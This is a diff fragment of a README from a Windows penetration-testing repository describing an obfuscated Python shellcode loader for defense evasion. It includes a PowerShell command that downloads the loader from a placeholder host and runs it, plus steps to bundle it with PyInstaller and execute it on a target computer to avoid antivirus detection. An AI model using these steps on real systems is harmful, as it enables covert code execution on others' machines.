Jean-Francois-C/Windows-Penetration-Testing/Defense evasion (examples)/Invoke-Python-ShellCodeLoader/README.md

     While obfuscation and encryption help evade static analysis by most antivirus solutions, this approach may offer reduced stealth compared to in-memory execution.
     Example:
     --------
-    C:\temp\python> powershell -c "wget -uri http://X.X.X.X/obfuscated_shellcodeloader.py -OutFile C:\temp\python\obfuscated_shellcodeloader.py"
+    C:\temp\python> powershell -c "wget -uri http://your-IP-or-website/obfuscated_shellcodeloader.py -OutFile C:\temp\python\obfuscated_shellcodeloader.py"
     C:\temp\python> python.exe .\obfuscated_shellcodeloader.py
 ```
-  - Option C: Use PyInstaller to bundle the obfuscated shellcode loader Python script into a single executable (e.g. script.exe) and then download and execute it on a target Windows computer
+  - Option C: Use PyInstaller to bundle the obfuscated shellcode loader Python script into a single executable (e.g. script.exe) and then download and execute it on a target Windows computer.
 ```
 1 - Use PyInstaller to bundle the obfuscated shellcode loader Python script into a single executable (e.g. script.exe)
     Example: